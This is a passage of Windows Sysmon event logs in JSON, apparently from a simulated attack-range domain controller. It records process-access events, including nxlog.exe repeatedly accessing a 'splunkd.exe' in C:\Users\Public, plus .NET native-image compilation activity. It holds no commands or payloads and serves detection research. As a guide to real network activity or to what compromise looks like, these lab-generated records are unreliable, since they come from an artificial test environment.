C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:44.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3596","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:45","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:45","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7000,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:45.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3580\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:45.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7001,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:46.555\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3592\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:46.555","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:59:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7002,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:59:46.805\r\nProcessGuid: {E2A3D6B1-12D9-5F25-0000-0010A8FE0900}\r\nProcessId: 2988\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bac-0\\System.Windows.Forms.dll\r\nCreationUtcTime: 2020-08-01 06:59:46.805","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:59:46.805","ProcessGuid":"{E2A3D6B1-12D9-5F25-0000-0010A8FE0900}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\bac-0\\System.Windows.Forms.dll","CreationUtcTime":"2020-08-01 06:59:46.805","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7003,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.009\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E3-5F25-0000-0010EA0B0A00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.009","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E3-5F25-0000-0010EA0B0A00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7004,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.009\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-12E3-5F25-0000-0010EA0B0A00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.009","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-12E3-5F25-0000-0010EA0B0A00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7005,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.024\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-12E3-5F25-0000-0010EA0B0A00}\r\nTargetProcessId: 2504\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.024","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-12E3-5F25-0000-0010EA0B0A00}","TargetProcessId":"2504","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:59:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:59:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7006,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:59:47.399\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}\r\nTargetProcessId: 1232\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:59:47.399","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-12E3-5F25-0000-0010AD0F0A00}","TargetProcessId":"1232","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 